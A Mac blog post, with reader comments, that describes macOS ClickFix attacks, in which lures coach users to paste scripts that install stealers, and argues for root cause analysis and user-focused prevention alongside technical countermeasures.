Last Week on My Mac: Root cause analysis and ClickFix

One of the highlights of my work as a medical practitioner was introducing adverse incident reporting and root cause analysis. Even in the most communicative and affable workplace, it’s often hard to admit that something has gone wrong and discover why. The moment outsiders become involved, it all too easily turns into a bout of blamestorming, driving truth underground.

Once you have seen how root cause analysis can pay off in one situation, you want to apply it elsewhere. So please bear with me as I dig a little deeper into what have become slightly inappropriately known as ClickFix attacks, and have been all the rage for the last few months.

ClickFix attacks in macOS

ClickFix attacks first emerged in Windows in early 2024, but hadn’t been reported in macOS until early December last year, when Stuart Ashenbrenner and Jonathan Semon of Huntress published a detailed account. In macOS they typically consist of three steps:

The victim is lured to a site that promises to fix a real or fictitious problem for them.
The hostile site coaches them to copy an opaque script and paste it into Terminal or another app that can run that script.
The script then downloads its malicious payload, normally a stealer, so bypassing macOS security, and proceeds to steal sensitive information from the user’s account on that Mac.

Those are illustrated by one of the early examples I stepped through in a locked-down virtual machine.

At the top of Google’s sponsored results is a solution from ChatGPT, giving its trusted web address. When I clicked on that, it took me to ChatGPT, where there’s a nice clear set of instructions, described impeccably just as you’d expect from AI. This coaches me how to open Terminal using Spotlight, very professional.

It then provides me with a command I can copy with a single click, and paste straight into Terminal. It even explains what that professes to do.

Once I have done that, scripts like .agent are installed in my Home folder, and my (virtual) Mac is now well and truly owned by its attacker.

At the end of January a variation emerged in sponsored search taking the unsuspecting to a malicious site disguised as a Medium.com blog post.

That started copying the contents of my Documents folder to “FileGrabber”, and wrote several hidden files to the top level of my Home folder, again in the safety of a locked-down VM.

Earlier this month, Jamf Threat Labs reported a similar attack abusing the applescript URL scheme to launch Script Editor and deliver another variant of the popular AMOS/SOMA stealer.

Countermeasures

In addition to Apple’s response in its weekly updates to XProtect’s detection rules, Patrick Wardle at Objective-See was quick to add a defence to his BlockBlock utility in mid-February, and Apple followed suit with an elaborate scheme added to macOS 26.4, released on 24 March. Although important, devising those defences is continuing the game of cat and mouse: no sooner are they in place than the attackers switch to a different ploy, as they have recently done by abusing a URL scheme and Script Editor. macOS offers a seemingly endless supply of mechanisms available for such abuse.

What has largely escaped attention is how bizarre user behaviour has become. Here’s a victim using a thoroughly GUI operating system copying what to them can only be incomprehensible gibberish and pasting it into Terminal, or running it in Script Editor. Why on earth would a user fall prey to that?

Prevention

Over the last few years many have grown accustomed to such strange habits as advice has drifted away from using GUI apps to relying on the command line. One factor has been the long decline in professionally written articles. For many years, my editor at MacFormat wouldn’t let me use Terminal commands in my Q&A pages unless there was no alternative. Almost all the dozens of books around me about Mac OS X rely primarily on what can be accomplished in the GUI, and are liberally illustrated with screenshots.

Over this period, tackling problems on Macs has moved from understanding how to use those GUI tools to blindly entering magic spells in Terminal, and now Script Editor. This trend has been promoted by search engines and most recently AI assistance, both of which are primarily text-based. Ask Google a Mac question, and the chances are you’ll be presented with commands to paste in, rather than a well-written account of how to solve it in the GUI.

Apple and third parties have invested in engineering solutions to problems that are fundamentally human and behavioural. Although it’s comforting to receive weekly updates to XProtect, and ingenious methods to detect potentially dangerous actions, no one has done anything about changing user behaviour. Apple seems reluctant to engage ordinary users beyond nudging them to keep macOS up to date, and no one is trying to save victims from their high risk behaviour.

This is also a common problem in healthcare, where we invest most of our resources in treatment, instead of preventing injury and disease. Although the clickfixers are unlikely to run out of victims, at least their crime could become less profitable.

3Comments

Add yours

1

Robert Hancock on April 12, 2026 at 7:22 am

Howard, Apple is partly to blame due its buggy software.

As an example, I’ve been using Xcode 26.3 on MacOS 26.3, then 26.4 and now 26.4.1. to code an app of some complexity and size. Periodically and more frequently recenty, after a successful build (Cmd + B), when I try to run the build at either the correct simulator or to an actual iPhone with the correct iOS and Arm64 settings, I get an error message to the effect that the build does not suit the target, which is complete BS. The only way past this impasse is to use a complex terminal command, that shamefully I had to use an AI to generate with the associated risk. I know Apple released Xcode 26.5 just a week or so ago but I am very hesitant to upgrade while in the middle of coding just in case… . And moreover, since the latest MacOS 26.4.1 upgrade, Xcode 26.3 has another odd error sometimes at a clean build.

It doesn’t inspire confidence

LikeLiked by 2 people
- 2
  
  hoakley on April 12, 2026 at 8:24 am
  
  Thank you, Robert, but I think this confirms my case for root cause analysis, and not that for blamestorming.
  
  Even if someone were to wave a magic wand and fix every bug in macOS instantly, those aren’t driving ordinary users to this aberrant behaviour. One of the most common lures into ClickFix on Macs is to offer to clear disk/storage space. To its credit, Google is currently offering an AI digest of an Apple support article, rather than links to potential ClickFixes or other glib solutions.
  
  However, if you look at Apple’s support info, that provided in Tips isn’t at all good, and you have to go to a separate support article for a fuller account. That follows Apple doctrine, for instance in presenting iCloud Drive as a good solution (without mentioning the problems it brings with backup), and avoiding mentioning the possibility that some of the system data might be accounted for by huge snapshots. Indeed, nowhere does the word snapshot appear, nor is there any effort made to help the user understand what can consume large amounts of storage. This is in spite of recent improvements in the Storage feature.
  
  You might have thought that, given that popular and successful lure for ClickFix, Apple might have had a campaign to explain better to users how to tackle this common problem, much in the way that preventive health campaigns are run.
  
  Howard.
  
  LikeLiked by 1 person
3

Enzo Vincenzo on April 12, 2026 at 8:31 am

Good morning, Howard, and happy Sunday to everyone.
You’re absolutely right! But I fear that your message on prevention, if taken the wrong way by Apple or… by Europe, could lead to a dictatorial crossroads.
It wouldn’t take much to decide that ‘for the safety of ordinary users’ macOS must be a closed system (as iOS, iPadOS and tvOS effectively are) and that Apple must remove Terminal, Directory Utility and anything else that allows us to do whatever we want with our Macs.

After all, Apple has long since hidden even an important utility – one that many young users are unaware of – such as the monitor Profiles Assistant for correcting or creating an ideal display configuration.
And even if you do track it down in System… unless you’re enlightened by Heaven (or AI…), you can’t fathom the perverse mechanism for activating ‘Expert’ mode from System Settings, but you’d think you could simply adjust a slider to change the colour temperature.

It wouldn’t take much for Apple (or Europe…) to hide System folders entirely, as it has already done with the various partitions in Disk Utility, and to declare that Terminal is useless and dangerous and should be removed.
After that, it would be capable of inserting a blacklist into the system to block the use of any similar third-party applications.
And perhaps full freedom will be granted only to those who need to use the Mac for military or espionage purposes and, naturally, provided they are American…

Obviously I’ve gone a bit over the top with my doomsday view, 🤣🤣🤣 – to put it briefly – as a full discussion on the matter would be quite extensive.

LikeLiked by 1 person

ClickFix attacks in macOS

Countermeasures

Prevention

Share this:

Related